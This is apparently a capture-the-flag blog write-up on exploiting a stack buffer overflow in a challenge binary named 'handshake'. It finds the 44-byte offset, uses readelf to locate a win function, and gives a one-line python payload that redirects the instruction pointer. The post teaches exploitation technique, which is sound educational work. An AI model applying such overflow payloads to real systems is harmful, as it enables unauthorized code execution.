If you have missed 1.0 Here you go: Click Here
Continuing with PWN 1.0 Here we take another CTF challenge and solve it
Lets PWN :)
We are given with a binary (handshake) and we need to pwn that
Lets try to find some overflow here!
Now our task is to find the buffer size in order to make the ip point to custom address
So we got right, 40 should be the buffer size, so Now to check the instruction pointer we can use dmsg which will examine the kernel ring buffer.
Check the last one, ip is at 0x00000000000007d4. but still we didn’t get our 41 i.e A’s Hex into the ip, so we must increase our input so that the buffer overwrites the ip.
So with 48 A’s we can see that our ip points to 0x0000000041414141
So with 44 with Payload must work.
But where should we point our ip ?
Here I am introducing you to readelf (readelf displays information about one or more ELF format object files.)
So this has some function address, objects etc…
Lets do some grep
readelf -s <binary>| grep -i "FUNC"
Analyzing the funcs, we can see that there is something called win function (Line 64 with address 0x080491c2) so our aim is to point the ip to that function in order to get the flag.
So lets pack now :)
Payload
python -c "print 'A'*44 + '\xc2\x91\x04\x08'" | ./handshake
We made it right!
Lets hack together:)
YouTube: https://youtube.com/programmingforfun
Instagram: https://www.instagram.com/buff3r0verflow/
Have Fun pwning them:)
